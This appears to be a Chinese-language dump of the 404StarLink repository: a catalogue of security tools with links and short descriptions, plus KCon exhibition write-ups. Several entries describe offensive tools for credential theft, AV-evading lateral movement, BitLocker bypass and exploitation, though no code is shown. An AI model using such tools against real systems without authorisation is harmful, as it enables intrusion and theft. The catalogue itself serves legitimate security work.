ksubdomain是一款基于无状态子域名爆破工具,支持在Windows/Linux/Mac上使用,它会很快的进行DNS爆破,在Mac和Windows上理论最大发包速度在30w/s,linux上为160w/s的速度。
### [qscan](detail/qscan.md)




<https://github.com/qi4L/qscan>
一个速度极快的内网扫描器,具备端口扫描、协议检测、指纹识别,暴力破解,漏洞探测等功能。支持协议1200+,协议指纹10000+,应用指纹20000+,暴力破解协议10余种。
### [Kunyu](detail/Kunyu.md)




<https://github.com/knownsec/Kunyu>
Kunyu(坤舆),是一款基于ZoomEye API开发的信息收集工具,旨在让企业资产收集更高效,使更多安全相关从业者了解、使用网络空间测绘技术。
### [Glass](detail/Glass.md)




<https://github.com/s7ckTeam/Glass>
Glass是一款针对资产列表的快速指纹识别工具,通过调用Fofa/ZoomEye/Shodan/360等api接口快速查询资产信息并识别重点资产的指纹,也可针对IP/IP段或资产列表进行快速的指纹识别。
### [scaninfo](detail/scaninfo.md)




<https://github.com/redtoolskobe/scaninfo>
scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具,其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点,能够快速进行端口扫描和服务识别,内置指纹识别用于 web 探测,可以用报告的方式整理扫描结果。
### [ZoomEye-Python](detail/ZoomEye-Python.md)




<https://github.com/knownsec/ZoomEye-python>
ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库,提供了 ZoomEye 命令行模式,同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据
### [ct](detail/ct.md)




<https://github.com/knownsec/ct>
ct 是一款使用 rust 语言进行开发,并且基于ZoomEye域名查询以及利用域名字典进行子域名爆破的工具,同时在最终爆破完成后可使用脚本,将相应的的.gv 文件转化成为相应的 .png 文件进行可视化展示
### [xtate](detail/xtate.md)




<https://github.com/babycoff/xtate>
Xtate是面向互联网规模网络测量的模块化全栈扫描器(框架)。利用自研的应用层无状态扫描模型ZBanner和混合状态轻量级TCP协议栈HLTCP实现异步高速扫描。与已有的无状态端口扫描器只能探测端口是否开放不同,Xtate基于应用层无状态扫描模型,在千兆带宽下能够在6分钟内完成中国大陆地址集中所有80端口的开放性检测和Banner抓取。基于HLTCP用户态协议栈实现和TLS支持,Xtate也能够在有状态模式下执行多轮数据交互的高速扫描,包括TLS上层服务Banner抓取。Xtate框架提供统一接口以自定义模块实现不同的扫描任务,专注于大规模网络的协议层面测量(包括传输层、应用层和TLS上层服务),具有坚实的底层高速异步数据包收发机制,期望为学术和实践领域中大规模网络测量的各种算法和任务提供承载平台。
### [Zoomeye-Tools](detail/ZoomEye-Tools.md)




<https://github.com/knownsec/Zoomeye-Tools>
一个配合ZoomEye使用的Chrome插件,可以查看当前网页所在ip信息或跳转查看详细信息,还可以根据关键词一键跳转至ZoomEye进行搜索
### [ZoomEye-go](detail/ZoomEye-go.md)




<https://github.com/gyyyy/ZoomEye-go>
ZoomEye-go 是一款基于 ZoomEye API 开发的 Golang 库,提供了 ZoomEye 命令行模式,同时也可以作为SDK集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据。
### [vultrap](detail/vultrap.md)




<https://github.com/liqzz/vultrap>
在开源领域,从来不缺少优秀的漏洞POC框架和POC,现今情况下,当有相关漏洞的漏洞情报出现的时候,其用于漏洞的验证的POC代码或利用请求都会很快的被公布在互联网上,比如Nuclei等漏洞检测框架也会即时得跟进新的漏洞,并以漏洞检测模板的形式进行更新,如nuclei 的nuclei-temaplte 仓库几乎每天都会出现新的漏洞需求和检测模板提交。对于漏洞检测模板而言,其主要目的用来验证目标是否存在漏洞,但仔细了解漏洞检测的机制之后,漏洞检测大多数情况下实际就是构造请求和判断响应的过程,那么基于次,是否可以反向思维,通过判断漏洞验证的请求来返回迷惑性的结果,扰乱扫描器的判断呢,其实本质还是honeypot的思路,也可以称“漏洞伪装”,也是本项目 vultrap的实现背景。
## 漏洞探测/vulnerability_assessment
### [afrog](detail/afrog.md)




<https://github.com/zan8in/afrog>
afrog 是一款性能卓越、快速稳定、PoC 可定制的漏洞扫描工具,PoC 包含 CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型,帮助网络安全从业者快速验证并及时修复漏洞。
### [Kunpeng](detail/Kunpeng.md)




<https://github.com/opensec-cn/kunpeng>
Kunpeng是一个Golang编写的开源POC检测框架,集成了包括数据库、中间件、web组件、cms等等的漏洞POC,可检测弱口令、SQL注入、XSS、RCE等漏洞类型,以动态链接库的形式提供调用,通过此项目可快速开发漏洞检测类的系统,比攻击者快一步发现风险漏洞。
### [Pocassist](detail/Pocassist.md)




<https://github.com/jweny/pocassist>
Pocassist 是一个 Golang 编写的全新开源漏洞测试框架,帮助安全人员专注于漏洞验证的逻辑的实现。Pocassist 提供了简洁的 Web 图形化界面,用户可以在线编辑漏洞验证程序即可进行批量的测试;规则完全兼容 xray,可以直接使用现有开源的 PoC 库,同时也支持添加自定义规则。
### [myscan](detail/myscan.md)




<https://github.com/amcai/myscan>
myscan是参考awvs的poc目录架构,pocsuite3、sqlmap等代码框架,以及搜集互联网上大量的poc,由python3开发而成的被动扫描工具。
### [LSpider](detail/LSpider.md)




<https://github.com/knownsec/LSpider>
LSpider 一个为被动扫描器定制的前端爬虫
## 攻击与利用/penetration_test
### [dperf](detail/dperf.md)




<https://github.com/baidu/dperf>
dperf 是一个100Gbps的网络性能与压力测试软件。国内多个知名安全厂商用dperf测试其防火墙。知名开源四层负载均衡DPVS在用dperf做性能测试,发布性能测试报告。
### [CDK](detail/CDK.md)




<https://github.com/cdk-team/CDK>
CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的逃逸、横向移动、持久化利用方式,插件化管理。
### [pocsuite3](detail/pocsuite3.md)




<https://github.com/knownsec/pocsuite3>
pocsuite3是由Knownsec 404团队开发的开源远程漏洞测试和概念验证开发框架。它带有强大的概念验证引擎,以及针对最终渗透测试人员和安全研究人员的许多强大功能。
### [MDUT](detail/MDUT.md)




<https://github.com/SafeGroceryStore/MDUT>
MDUT 全称 Multiple Database Utilization Tools,旨在将常见的数据库利用手段集合在一个程序中,打破各种数据库利用工具需要各种环境导致使用相当不便的隔阂;MDUT 使用 Java 开发,支持跨平台使用。
### [JYso](detail/JYso.md)




<https://github.com/qi4L/JYso>
JYso是一个可以用于 jndi 注入攻击和生成反序列化数据流的工具,既可以当 JNDIExploit 用也可以当作 ysoserial 使用。
### [BurpCrypto](detail/BurpCrypto.md)




<https://github.com/whwlsfb/BurpCrypto>
支持多种加密算法或直接执行JS代码的用于爆破前端加密的BurpSuite插件。
### [WMIHACKER](detail/WMIHACKER.md)




<https://github.com/rootclay/WMIHACKER>
WMIHACKER是一款免杀横向渗透远程命令执行工具,常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令,这些方式都已经被杀软100%拦截,通过改造出的WMIHACKER可免杀横向移动。并且在企业网络目前阻断445端口严重的情况下可以无需445端口进行横向移动,效率高且不易被检测。
### [MySQL-Fake-Server](detail/MySQL-Fake-Server.md)




<https://github.com/fnmsd/MySQL_Fake_Server>
用于渗透测试过程中的假MySQL服务器,纯原生python3实现,不依赖其它包。
### [DNSlog-GO](detail/DNSlog-GO.md)




<https://github.com/lanyi1998/DNSlog-GO>
DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带WEB界面。单文件运行,无依赖。部署方便快捷。
### [Cloud-Bucket-Leak-Detection-Tools](detail/Cloud-Bucket-Leak-Detection-Tools.md)




<https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools>
Cloud-Bucket-Leak-Detection-Tools是一款针对云厂商存储桶扫描检测与利用的工具
### [ysomap](detail/ysomap.md)




<https://github.com/wh1t3p1g/ysomap>
Ysomap是一款适配于各类实际复杂环境的Java反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用。
### [Antenna](detail/Antenna.md)




<https://github.com/wuba/Antenna>
Antenna是58同城安全团队打造的一款辅助安全从业人员辅助验证网络中多种漏洞是否存在以及可利用性的工具。其基于带外应用安全测试( OAST)通过任务的形式,将不同漏洞场景检测能力通过插件的形式进行集合,通过与目标进行Out-of-bind的数据通信方式进行辅助检测。
### [GrabAccess](detail/GrabAccess.md)




<https://github.com/Push3AX/GrabAccess>
GrabAccess:Bookit/Windows登陆密码和Bitlocker绕过工具,在物理接触目标计算机的情况下,GrabAccess可以:绕过Windows登陆密码执行任意操作(以System权限执行命令、重置Windows账户密码等),植入木马并添加自启动(可以绕过Bitlocker,但要求受害者登录),通过修改主板UEFI固件实现无视重装系统、更换硬盘的持久化(Bootkit)
### [Redis-Rogue-Server](detail/Redis-Rogue-Server.md)




<https://github.com/Dliv3/redis-rogue-server>
Redis 4.x/Redis 5.x RCE利用脚本. 项目最初来源于 <https://github.com/n0b0dyCN/redis-rogue-server>
### [Cola-Dnslog](detail/Cola-Dnslog.md)




<https://github.com/AbelChe/cola_dnslog>
Cola Dnslog 是一款更加强大的dnslog平台(无回显漏洞探测辅助平台),支持dns http ldap rmi等协议,提供API调用方式便于与其他工具结合,支持钉钉机器人、Bark等提醒,并支持docker一键部署。
### [MysqlT](detail/MysqlT.md)




<https://github.com/BeichenDream/MysqlT>
伪造Myslq服务端,并利用Mysql逻辑漏洞来获取客户端的任意文件反击攻击。
## 信息分析/information_analysis
### [HackBrowserData](detail/HackBrowserData.md)




<https://github.com/moonD4rk/HackBrowserData>
hack-browser-data 是一个解密浏览器数据(密码/历史记录/Cookies/书签)的导出工具,支持全平台主流浏览器的数据导出窃取。
### [KunLun-M](detail/KunLun-M.md)




<https://github.com/LoRexxar/Kunlun-M>
KunLun-M是一个完全开源的静态白盒扫描工具,支持PHP、JavaScript的语义扫描,基础安全、组件安全扫描,Chrome Ext\Solidity的基础扫描。
### [Pillager](detail/Pillager.md)




<https://github.com/qwqdanchun/Pillager>
Pillager是一个适用于后渗透期间的信息收集工具,可以收集目标机器上敏感信息,方便下一步渗透工作的进行。
### [AppScan](detail/AppScan.md)




<https://github.com/TongchengOpenSource/AppScan>
安全隐私卫士(AppScan)一款免费的企业级自动化App隐私合规检测工具
### [frida-skeleton](detail/frida-skeleton.md)




<https://github.com/Margular/frida-skeleton>
frida-skeleton是基于frida的安卓hook框架,提供了很多frida自身不支持的功能,将hook安卓变成简单便捷,人人都会的事情。
### [java-object-searcher](detail/java-object-searcher.md)




<https://github.com/c0ny1/java-object-searcher>
java内存对象搜索辅助工具,配合IDEA在Java应用运行时,对内存中的对象进行搜索。比如可以可以用挖掘request对象用于回显等场景。
### [js-cookie-monitor-debugger-hook](detail/js-cookie-monitor-debugger-hook.md)




<https://github.com/JSREI/js-cookie-monitor-debugger-hook>
js cookie逆向利器:js cookie变动监控可视化工具 & js cookie hook打条件断点
### [MySQLMonitor](detail/MySQLMonitor.md)




<https://github.com/TheKingOfDuck/MySQLMonitor>
MySQL实时监控工具(代码审计/黑盒/白盒审计辅助工具)
### [CodeReviewTools](detail/CodeReviewTools.md)




<https://github.com/Ppsoft1991/CodeReviewTools>
CodeReviewTools是一个可以快速批量反编译jar包的工具,为审计Java代码做好第一步。
## 内网工具/intranet_tools
### [fscan](detail/fscan.md)




<https://github.com/shadow1ng/fscan>
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
### [antSword](detail/antSword.md)




<https://github.com/AntSwordProject/antSword>
中国蚁剑是一款开源的跨平台网站管理工具。
### [Stowaway](detail/Stowaway.md)




<https://github.com/ph4ntonn/Stowaway>
Stowaway 是一款多级代理工具,可将外部流量通过多个节点代理至内网,突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃,从外部dmz等一系列区域逐步深入核心网络;Stowaway 除了流量转发功能,还提供了端口复用、ssh隧道,流量伪装等专为渗透测试人员所用的功能。
### [shellcodeloader](detail/shellcodeloader.md)




<https://github.com/knownsec/shellcodeloader>
Windows平台的shellcode免杀加载器,自带多种加载方式:32位自带13种加载方式,64位自带12种加载方式。
### [ServerScan](detail/ServerScan.md)




<https://github.com/Adminisme/ServerScan>
一款使用Golang开发且适用于攻防演习内网横向信息收集的高并发网络扫描、服务探测工具。
### [Platypus](detail/Platypus.md)




<https://github.com/WangYihang/Platypus>
Platypus 是一个基于终端与 Web UI 交互式的反弹 Shell 会话管理工具。在实际的渗透测试中,为了解决 Netcat/Socat 等工具在文件传输、多会话管理方面的不足。该工具在多会话管理的基础上增加了在渗透测试中更加有用的功能,可以更方便灵活地对反弹 Shell 会话进行管理。
### [WMIHACKER](detail/WMIHACKER.md)




<https://github.com/rootclay/WMIHACKER>
WMIHACKER是一款免杀横向渗透远程命令执行工具,常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令,这些方式都已经被杀软100%拦截,通过改造出的WMIHACKER可免杀横向移动。并且在企业网络目前阻断445端口严重的情况下可以无需445端口进行横向移动,效率高且不易被检测。
### [rakshasa](detail/rakshasa.md)




<https://github.com/Mob2003/rakshasa>
rakshasa是一个使用Go语言编写的强大多级代理工具,专为实现多级代理,内网穿透而设计。它可以在节点群里面任意两个节点之间转发TCP请求和响应,同时支持socks5代理,http代理,并且可以引入外部http、socks5代理池,自动切换请求IP。
### [As-Exploits](detail/As-Exploits.md)




<https://github.com/yzddmr6/As-Exploits>
中国蚁剑后渗透框架
### [g3proxy](detail/g3proxy.md)




<https://github.com/bytedance/g3>
通用正向代理解决方案,同时带有TCP映射、TLS卸载/封装、透明代理、简单反向代理等功能
### [PortForward](detail/PortForward.md)




<https://github.com/knownsec/PortForward>
PortForward 是使用 Golang 进行开发的端口转发工具,解决在某些场景下内外网无法互通的问题
## 其他/others
### [AiPy](detail/AiPy.md)




<https://github.com/knownsec/aipyapp>
AiPy是知道创宇站在AI技术变革前沿,基于LLM(大语言模型)与高级编程语言Python 完美融合,打造的一款突破性产品。AiPy以创新的技术范式和更低的成本,重构AI生产力边界,让大模型集思考能力和主动执行任务于一体。
### [CyberStrikeAI](detail/CyberStrikeAI.md)




<https://github.com/Ed1s0nZ/CyberStrikeAI>
CyberStrikeAI 是一款 AI 原生安全测试平台,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎与完整的测试生命周期管理能力
### [f8x](detail/f8x.md)




<https://github.com/ffffffff0x/f8x>
一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等。
### [BinAbsInspector](detail/BinAbsInspector.md)




<https://github.com/KeenSecurityLab/BinAbsInspector>
BinAbsInspector(Binary Abstract Inspector)是一款用于自动化逆向工程和扫描二进制文件漏洞的静态分析器,是 Keenlab 孵化的长期研究项目。基于 Ghidra 的支持下的抽象解释,适用于 Ghidra 的 Pcode 而非汇编。目前支持 x86、x64、armv7 和 aarch64 的二进制文件。
### [Heimdallr](detail/Heimdallr.md)




<https://github.com/graynjo/Heimdallr>
一款完全被动监听的谷歌插件,用于高危指纹识别、蜜罐特征告警和拦截、机器特征对抗。
### [passive-scan-client](detail/passive-scan-client.md)




<https://github.com/c0ny1/passive-scan-client>
Passive Scan Client是一款可以将经过筛选的流量转发到指定代理的Burp被动扫描流量转发插件
### [AntiDebug_Breaker](detail/AntiDebug_Breaker.md)




<https://github.com/0xsdeo/AntiDebug_Breaker>
本插件是基于Hook_JS库所写的Google插件,将致力于辅助前端JavaScript逆向以及渗透测试信息收集。
### [agentic-soc-platform.json](detail/agentic-soc-platform.md)




<https://github.com/FunnyWolf/agentic-soc-platform>
Agentic SOC Platform 是一个功能强大、灵活且开源的自动化安全运营平台。它集成了 AI Agent 能力与自动化编排,支持主流 SIEM/SOAR 场景,帮助企业高效构建智能化安全运营体系。
### [GrabAccess](detail/GrabAccess.md)




<https://github.com/Push3AX/GrabAccess>
GrabAccess:Bookit/Windows登陆密码和Bitlocker绕过工具,在物理接触目标计算机的情况下,GrabAccess可以:绕过Windows登陆密码执行任意操作(以System权限执行命令、重置Windows账户密码等),植入木马并添加自启动(可以绕过Bitlocker,但要求受害者登录),通过修改主板UEFI固件实现无视重装系统、更换硬盘的持久化(Bootkit)
### [JNDIMap](detail/JNDIMap.md)




<https://github.com/X1r0z/JNDIMap>
一个 JNDI 注入利用框架, 支持 RMI、LDAP 和 LDAPS 协议, 包含多种高版本 JDK 绕过方式
### [Typhon](detail/Typhon.md)




<https://github.com/LamentXU123/Typhon>
Typhon 是绕过 pyjail 的一把梭的CTF工具
### [wam](detail/wam.md)




<https://github.com/knownsec/wam>
WAM是一个由Python开发的用于监控'Web App'、'动态网络信息'的平台。在一定程度上,它极大地帮助安全研究人员节省了跟踪代码补丁的时间。
### [WeaponizedVSCode](detail/WeaponizedVSCode.md)




<https://github.com/Esonhugh/WeaponizedVSCode>
一个基于VSCode工作区的黑客环境工具。
### [LBot](detail/LBot.md)




<https://github.com/knownsec/LBot>
LBot主要用于方便的编写一个xss的bot程序。使用者可以简单的修改其逻辑以及配置环境,即可获得一个简单的xss的bot程序。由于原型来自于爬虫程序,所以只要前端有一定的频率限制,后端很难出现问题,比较稳定。
================================================
FILE: banner.md
================================================
## Banner
开源作者收到星链计划邀请函后,希望开源作者可以添加星链计划 Banner 到项目 README 的末尾,这样可以极大增加星链计划的影响力。
**中文版本**
```
## 404星链计划
<img src="https://github.com/knownsec/404StarLink/raw/master/Images/logo.png" width="30%">
(项目名称) 现已加入 [404星链计划](https://github.com/knownsec/404StarLink)
```
## 404星链计划
<img src="https://github.com/knownsec/404StarLink/raw/master/Images/logo.png" width="30%">
AAAA 现已加入 [404星链计划](https://github.com/knownsec/404StarLink)
**英文版本**
```
## 404Starlink
<img src="https://github.com/knownsec/404StarLink/raw/master/Images/logo.png" width="30%">
(ProjectName) has joined [404Starlink](https://github.com/knownsec/404StarLink)
```
## 404Starlink
<img src="https://github.com/knownsec/404StarLink/raw/master/Images/logo.png" width="30%">
AAAA has joined [404Starlink](https://github.com/knownsec/404StarLink)
================================================
FILE: column/2021KCon_exhibition_with_starlink.md
================================================
## 入选2021Kcon黑客大会兵器谱
KCon 黑客大会由知道创宇主办,秉持着追求干货、乐于分享的精神,力求为每一位热爱黑客技术研究的伙伴打造一个尽情展示、互动交流的创意舞台。如今,历经十年打磨,KCon 黑客大会已成长为国际网络安全圈极富活力与影响力的前沿网络安全攻防技术交流平台。本届 KCon 选择以“纵横”为主题,十之一纵一横,包罗万象,正如网络空间的攻与防,变幻莫测。而纵横之下的这场网安论道,将以打造全球性网安交流平台为发展目标,加速强化中国网安力量。
<div align="center">
<img src="Images_2021KCon/1.jpeg" width="700">
</div>
详情可以访问: <http://kcon.knownsec.com/2021/#/>
为了鼓励国内安全自动化工具的发展,展示更多黑客及安全人员们的安全自动化研究成果,自 2016年 起,KCon 黑客大会便引入「兵器谱」展示环节。过去几届 KCon 黑客大会现场,已有三十多件“安全神兵利器”受到千余名参会黑客的观摩与试用,并获得媒体朋友们的广泛关注。
今年,在历时两个多月的招募与评选后,我们精心为大家挑选出了 11 件安全江湖的“神兵利器”,将于 KCon 现场尽情探索与展示!
<div align="center">
<img src="Images_2021KCon/2.jpeg" width="400">
</div>
详情可以访问: <http://kcon.knownsec.com/2021/#/arsenal>
在今年的兵器谱中,星链计划有大量的项目内推投稿到兵器谱,其中有 8 件安全江湖的“神兵利器”入选,他们是:
* [CDK](#cdk)
* [Kunyu](#kunyu)
* [f8x](#f8x)
* [Viper](#viper)
* [KunLun-M](#kunlun-m)
* [Pocassist](#pocassist)
* [Stowaway](#stowaway)
* [GShark](#gshark)
>排名不分先后
----------------------------------------
### [CDK](../detail/CDK.md)



<https://github.com/cdk-team/CDK>
CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的逃逸、横向移动、持久化利用方式,插件化管理。
<div align="center">
<img src="Images_2021KCon/cdk.png" width="700">
</div>
### [Kunyu](../detail/Kunyu.md)



<https://github.com/knownsec/Kunyu>
Kunyu 是基于 ZoomEye 开发的工具,旨在让企业资产梳理更加高效,使更多安全从业者了解、使用网络空间测绘技术。
<div align="center">
<img src="Images_2021KCon/kunyu.png" width="700">
</div>
### [f8x](../detail/f8x.md)



<https://github.com/ffffffff0x/f8x>
一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等。
<div align="center">
<img src="Images_2021KCon/f8x.png" width="700">
</div>
### [Viper](../detail/Viper.md)



<https://github.com/FunnyWolf/Viper>
VIPER是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化。
<div align="center">
<img src="Images_2021KCon/viper.jpg" width="700">
</div>
### [KunLun-M](../detail/KunLun-M.md)



<https://github.com/LoRexxar/Kunlun-M>
Kunlun-Mirror 专注于安全研究人员使用的白盒代码审计工具
<div align="center">
<img src="Images_2021KCon/kunlun.png" width="700">
</div>
### [Pocassist](../detail/Pocassist.md)



<https://github.com/jweny/pocassist>
Pocassist 是一个 Golang 编写的全新开源漏洞测试框架,帮助安全人员专注于漏洞验证的逻辑的实现。Pocassist 提供了简洁的 Web 图形化界面,用户可以在线编辑漏洞验证程序即可进行批量的测试;规则完全兼容 xray,可以直接使用现有开源的 PoC 库,同时也支持添加自定义规则。
<div align="center">
<img src="Images_2021KCon/pocassist.jpg" width="700">
</div>
### [Stowaway](../detail/Stowaway.md)



<https://github.com/ph4ntonn/Stowaway>
Stowaway 是一款多级代理工具,可将外部流量通过多个节点代理至内网,突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃,从外部dmz等一系列区域逐步深入核心网络;Stowaway 除了流量转发功能,还提供了端口复用、ssh隧道,流量伪装等专为渗透测试人员所用的功能。
<div align="center">
<img src="Images_2021KCon/stowaway.png" width="700">
</div>
### [GShark](../detail/gshark.md)



<https://github.com/madneal/gshark>
一款开源敏感信息监测系统,可以监测包括 github、gitlab(目前不太稳定,由于gitlab对于免费用户不提供代码全文检索API)、searchcode 多平台的敏感信息监测。
<div align="center">
<img src="Images_2021KCon/gshark.png" width="700">
</div>
================================================
FILE: column/2022KCon_exhibition_with_starlink.md
================================================
## 入选2022KCon黑客大会兵器谱
2022年是 KCon 黑客大会举办的第11个年头,亦是10年圆满后踏上新征程的第1步,主题为“**+1 进阶,护航未来**”。
“+1”或许并不起眼,但“不积跬步,无以至千里;不积小流,无以成江海”。众多“+1”汇聚,便能以量变引起质变,化不可能为可能。网络空间发展至今,机遇与威胁并存,攻击与防守互搏。护航网络空间的未来发展之路,需要聚力成盾,这凝聚着安全技术人员每一次 **“+1”的修复、“+1”的努力、“+1”的创新、“+1”的突破**。
KCon黑客大会,汇聚黑客智慧,专注网络攻防技术交流。我们希望为众多“+1”的探索者提供分享与碰撞的舞台,为网络安全的进阶助力。
<div align="center">
<img src="Images_2022KCon/1.png" width="700">
</div>
详情访问:[KCon 2022 - KCon 黑客大会](https://kcon.knownsec.com/list-kcon2022.html)
众所周知,网络实战攻防离不开各类自动化工具的运用。安全自动化工具是网安研究人员脑力和经验的结晶,它的加持能让安全人员从“白打”升级到全副武装状态,帮助展示及处理诸多复杂、耗时的安全问题,明确风险、提升效率、加强防御。
KCon「兵器谱」展示便是为鼓励国内安全自动化工具的发展而设立,现已成为每届 KCon 的传统。本届 KCon,有**14**件经过精心筛选的安全“兵器”等待大家探索。
<div align="center">
<img src="Images_2022KCon/2.png" width="700">
</div>
其中有 7 个项目来自404星链计划,他们分别是:
- AppInfoScanner
- As-Exploits
- Cloud-Bucket-Leak-Detection-Tools
- fscan
- HaE
- openstar
- veinmind-tools
>排名不分先后
### [AppInfoScanner](https://github.com/knownsec/404StarLink/blob/master/detail/AppInfoScanner.md)




https://github.com/kelvinBen/AppInfoScanner
一款适用于以HW行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如:Title、Domain、CDN、指纹信息、状态信息等。
[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1Mt4y1J7Vh?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
### [As-Exploits](https://github.com/knownsec/404StarLink/blob/master/detail/As-Exploits.md)




https://github.com/yzddmr6/As-Exploits
中国蚁剑后渗透框架
### [Cloud-Bucket-Leak-Detection-Tools](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools)




https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools
云原生安全近几年比较火,存储桶在企业(SRC众测)中暴露的问题也非常多,不仅仅局限于AK/SK的泄露,更多的是用户配置侧的问题,这款工具就是用来代替我们手工解决一些繁琐的操作。
[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1ye411g76v?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
### [fscan](https://github.com/knownsec/404StarLink/blob/master/detail/fscan.md)




https://github.com/shadow1ng/fscan
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1vG4115722?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
### [HaE](https://github.com/knownsec/404StarLink/blob/master/detail/HaE.md)




https://github.com/gh0stkey/HaE
HaE是一款可以快速挖掘目标指纹和关键信息的Burp插件。
[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV16D4y167uX?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
### [OpenStar](https://github.com/knownsec/404StarLink/blob/master/detail/OpenStar.md)




https://github.com/starjun/openstar
OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙,支持复杂规则编写。提供了常规的 HTTP 字段规则配置,还提供了 IP 黑白名单、访问频次等配置,对于 CC 防护更提供的特定的规则算法,并且支持搭建集群进行防护。
[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1YB4y1G7mr?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
### [veinmind-tools](https://github.com/knownsec/404StarLink/blob/master/detail/veinmind-tools.md)




https://github.com/chaitin/veinmind-tools
veinmind-tools 是基于 veinmind-sdk 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。
[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1MP411V7v6?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
================================================
FILE: column/2023KCon_exhibition_with_starlink.md
================================================
## 入选2023KCon黑客大会兵器谱
KCon大会,国际网络安全圈富有活力与影响力的前沿网络安全攻防技术交流平台,以“追求干货有趣”为宗旨,力求为网安技术研究者们打造一个尽情展示、尽情交流的创意舞台,期待以技术之力引领业界未来的变革。
在数字化浪潮奔腾汹涌的当下,数字的汇聚引起AI的“智变”,也引起了更多值得被关注的网络安全风险。安全是发展的前提,网络安全技术的创新与进步是数字中国建设的重要支撑。
因此,本届KCon大会着眼数智时代的网安风险,以 **“归源·智变”** 为主题,意在以技术初心凝聚行业之力,为护航数智时代的安全发展贡献绵薄之力。
<div align="center">
<img src="Images_2023KCon/1.jpeg" width="700">
</div>
详情访问:[KCon 2023 - KCon 黑客大会](https://kcon.knownsec.com/list-kcon2023.html)
网络空间的实战攻防离不开各类自动化工具的运用。这些工具就如同网安战场上的“兵器”,可以为安全人员进行“全副武装”,帮助展示及处理诸多复杂、耗时的安全问题,明确风险、提升效率、加强防御。
AI大模型的横空出世,带来了新一轮技术工具的进化热潮,网络安全行业也纷纷跟进。KCon一直聚焦当下前沿的研究方向与工具技术,「兵器谱」展示环节便是为了鼓励国内安全自动化工具发展而设立。
在KCon 2023的大会现场,10件由大众评选出的安全神兵利器将同台亮相展区,等待大家的探索。“锻造”出这些“兵器”的网安巧匠也将在展示区为大家讲解演示,传授使用“秘籍”。
<div align="center">
<img src="Images_2023KCon/2.png" width="700">
</div>
其中有 3 个项目来自404星链计划,他们分别是:
- Hades
- ENScanGo
- CF
>排名不分先后
### [Hades](https://github.com/knownsec/404StarLink/blob/master/detail/Hades.md)



https://github.com/theSecHunter/Hades
Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统,其中每个插件均可独立分开运行。
<div align="center">
<img src="Images_2023KCon/hades.png" width="700">
</div>
### [ENScanGo](https://github.com/knownsec/404StarLink/blob/master/detail/ENScanGo.md)



https://github.com/wgpsec/ENScan_GO
剑指HW/SRC,解决在HW/SRC场景下遇到的各种针对国内企业信息收集难题。
<div align="center">
<img src="Images_2023KCon/enscango.png" width="700">
</div>
### [CF](https://github.com/knownsec/404StarLink/blob/master/detail/cf.md)



https://github.com/teamssix/cf
CF 是一个云环境利用框架,适用于在红队场景中对云上内网进行横向、SRC 场景中对 Access Key 即访问凭证的影响程度进行判定、企业场景中对自己的云上资产进行自检等等。
<div align="center">
<img src="Images_2023KCon/cf.png" width="700">
</div>
================================================
FILE: column/2024KCon_exhibition_with_starlink.md
================================================
## 入选2024KCon黑客大会兵器谱
KCon 黑客大会,知道创宇出品,始终秉承“追求干货、有趣”的理念,打造开放的网络安全攻防技术交流平台,“汇聚全球黑客的智慧”是 KCon 黑客大会的一贯宗旨。
